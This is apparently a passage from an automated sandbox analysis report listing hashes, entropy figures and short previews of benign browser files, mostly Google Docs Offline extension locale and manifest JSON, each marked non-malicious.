                                                                                                                                                                                                                                                Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1969
                                                                                                                                                                                                                                                Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):291
                                                                                                                                                                                                                                                Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):130866
                                                                                                                                                                                                                                                Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.416666604226286
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:7cifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNd5+:gi58oSWIZBk2MM6AFBfo
                                                                                                                                                                                                                                                MD5:45F34D274BC84860495CE4CA6504F260
                                                                                                                                                                                                                                                SHA1:80A73C88EA18D801099FB39839BF04E654756BF8
                                                                                                                                                                                                                                                SHA-256:C8CE9019F895593A2B905BB459609E2627BA9F515B7DAB38F6555F8E5048E024
                                                                                                                                                                                                                                                SHA-512:DC2302B6D37BB309FF3BB584E9D36904608E6784BF160C9FAEACCA9A6A59FC1E2D74BB686B07197299A1BA2613672D203DB7BF428413424492C5CC543E977026
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10127)
                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                Size (bytes):10132
                                                                                                                                                                                                                                                Entropy (8bit):5.7560360552217755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:bBFd66666fvaESUvtzy4S4R3SbCA9TpH6666K4If42dKYsVNp/JK3zLW6:bd66666qHezyI8b1zH6666KhAwKY2NW5
                                                                                                                                                                                                                                                MD5:D2AEFE3FA6D5506F619566E2BD49EBB4
                                                                                                                                                                                                                                                SHA1:CC6441FB36984FDDEC61353997EC7B4F924EE631
                                                                                                                                                                                                                                                SHA-256:7645B361F6A5C2ED86201ADAF7359D7D75849F0C7B4100C19BEDF305D32F477F
                                                                                                                                                                                                                                                SHA-512:1EBF94063CB9E8B8586378148CFAD38989C149C568C8E5D3390B031182EAE11F29AEF5DADFE3AF69C37DCCA4F8435AB9261014969E208D847CC6E41C6C0AA558
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
